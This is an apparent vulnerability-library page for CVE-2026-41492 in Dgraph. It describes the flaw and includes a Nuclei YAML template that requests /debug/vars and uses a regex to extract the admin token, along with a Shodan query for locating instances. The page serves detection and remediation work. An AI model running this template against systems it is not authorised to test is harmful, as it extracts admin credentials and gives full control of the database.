/Vulnerability Library

Dgraph <= 25.3.2 - Admin Token Disclosure

CVE-2026-41492
Verified

Description

Dgraph <= 25.3.2 contains an information disclosure caused by unauthenticated access to the /debug/vars endpoint , which publishes the cmdline variable including the --security token= flag, letting unauthenticated remote attackers retrieve the admin token and access admin-only endpoints, exploit requires no authentication.

Severity

Critical

CVSS Score

9.8

Exploit Probability

2%

Affected Product

dgraph

Published Date

April 29, 2026

Template Author

divine balija

CVE-2026-41492.yaml
id: CVE-2026-41492

info:
  name: Dgraph <= 25.3.2 - Admin Token Disclosure
  author: Divine Balija
  severity: critical
  description: |
    Dgraph <= 25.3.2 contains an information disclosure caused by unauthenticated access to the /debug/vars endpoint , which publishes  the cmdline variable including the --security token= flag, letting unauthenticated remote attackers retrieve the admin token and access admin-only endpoints, exploit requires no authentication.
  impact: |
    Unauthenticated attackers can retrieve the admin token and gain full administrative control over the Dgraph instance.
  remediation: |
    Update to Dgraph version 25.3.3 or later.
  reference:
    - https://github.com/dgraph-io/dgraph/security/advisories/GHSA-vvf7-6rmr-m29q
    - https://nvd.nist.gov/vuln/detail/CVE-2026-41492
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2026-41492
    epss-score: 0.02187
    epss-percentile: 0.80235
    cwe-id: CWE-200
  metadata:
    verified: true
    max-request: 1
    vendor: dgraph
    product: dgraph
    shodan-query: "Dgraph"
  tags: cve,cve2026,dgraph,exposure,token

http:
  - method: GET
    path:
      - "{{BaseURL}}/debug/vars"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "cmdline"
          - "token="
        condition: and

      - type: word
        part: content_type
        words:
          - "application/json"

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        part: body
        group: 1
        regex:
          - 'token=([^"\\]+)'
# digest: 4b0a00483046022100acf1dcdeb69a59743404d8504f09ea1e9c3160e758933a6350f0ed31db04f9b7022100d0894787763362e8168d719e12de0505006dbaac8dbb73a4323ff418ae43f574:922c64590222798bb761d5b6d8e72950
9.8Score

CVSS Metrics

CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVE ID:
cve-2026-41492
CWE ID:
cwe-200

References

https://github.com/dgraph-io/dgraph/security/advisories/GHSA-vvf7-6rmr-m29qhttps://nvd.nist.gov/vuln/detail/CVE-2026-41492

Remediation Steps

Update to Dgraph version 25.3.3 or later.